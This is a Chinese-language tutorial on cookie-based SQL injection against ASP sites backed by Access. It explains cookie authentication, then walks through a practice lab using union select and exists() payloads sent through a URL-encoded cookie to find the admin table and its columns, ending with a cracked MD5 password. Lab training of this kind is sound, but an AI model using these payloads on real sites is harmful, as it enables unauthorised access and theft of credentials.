15、注入篇--Cookie注入（Access）

Access

Access是微软发布的关系数据库管理系统

基础语法同MySQL语法相似

注意：Access没有库的概念，只有表的概念

通常于ASP脚本语言搭配使用

Cookie

​ cookie:一串随机字符串，存储在用户本地终端上的数据，是某些网站为了辨别用户身份，进行session跟踪而存储在用户本地终端上的数据(通常经过加密)，由用户客户端计算机暂时后永久保存的信息

存在意义

​ Cookie认证技术简化了用户访问Web网站资源的过程，即用户只需在初次登录网站时输入身份信息进行认证，随后便可以访问被授权的所有站点资源，不再重复手工提交身份信息

Cookie的认证机制

​ 在web认证中，因为http协议本身的局限，必须采用其他技术将相应认证标识以某种方式持续传送，以免客户从一个页面跳转到同站另一个页面时又需要重新输入认证信息

基于Cookie的认证过程，由三个阶段组成：

• 发布Cookie: 当用户 访问某个web站点时需要认证资源时，Web服务器会检查用户是否提供了认证cookie，如果没有，则重定向到登录界面。在用户登录成功后，web服务器会产生认证cookie，并通过HTTP响应中的set-cookie发生给客户端，用于对用户随后的请求进行检查和验证

• 检索Cookie:在用户随后的访问请求中，客户端浏览器检索Path和Domain等属于与用户请求资源相匹配的cookie，并找到cookie通过HTTP请求中的cookie头提交给服务器

• 验证cookie：Web服务器提取客户端浏览器递交的cookie，验证体重的访问令牌。

  如合法，则将访问请求的资源发生给客户端浏览器，反之则拒绝用户的访问请求

设置的cookie能够影响页面的数据，不一定存在SQL注入

可能有cookie注入的网站：

• ASP的站点
• PHP版本低于5.3的版本

判断网站所使用的数据库

常见状况

• ASP - Access
• PHP - MySQL | Oracle | mssql
• ASPX - mssql
• JSP - Oracle | MySQL

靶场

1、进入靶场，发现是id为参数传值，直接使用171-1

页面发送变化

2、可以传参，可能存在注入；使用 order by 探测字段

3、判断字段 10，上union联合查询，弹出警告

4、试一试cookie是否可以进行传参，使用插件，改掉cookie中id的值为170，并删除URL中的?id170

5、页面显示正常，判断可进行SQL注入
使用联合查询
-1 union select 1,2,3,4,5,6,7,8,9,10
注意：cookie传值需要进行URL编码
编码后进行cookie传参，页面报错

6、 .asp?id=170 是asp脚本开发的，数据库很可能是access数据库
access没有库的概念，故使使用exists()函数 进行猜测表名
exists() 查询到结果集中有数据就返回真，反之为假
170 and exists(select * from admin)

7、页面返回正常，说明存在admin表
探测回显点：
1700 union select 1,2,3,4,5,6,7,8,9,10 from admin

8、得到回显点，继续使用exists()函数猜测admin表中的字段
猜测admin字段
170 and exists(select admin from admin)

9、猜测username字段
170 and exists(select username from admin)

10、猜测password字段
170 and exists(select password from admin)

11、得出username、password字段名的信息

12、password进行了加密，有点像MD5加密，故复制该字符串到MD5解密网站，得出密码

13、得到用户名admin、密码welcome；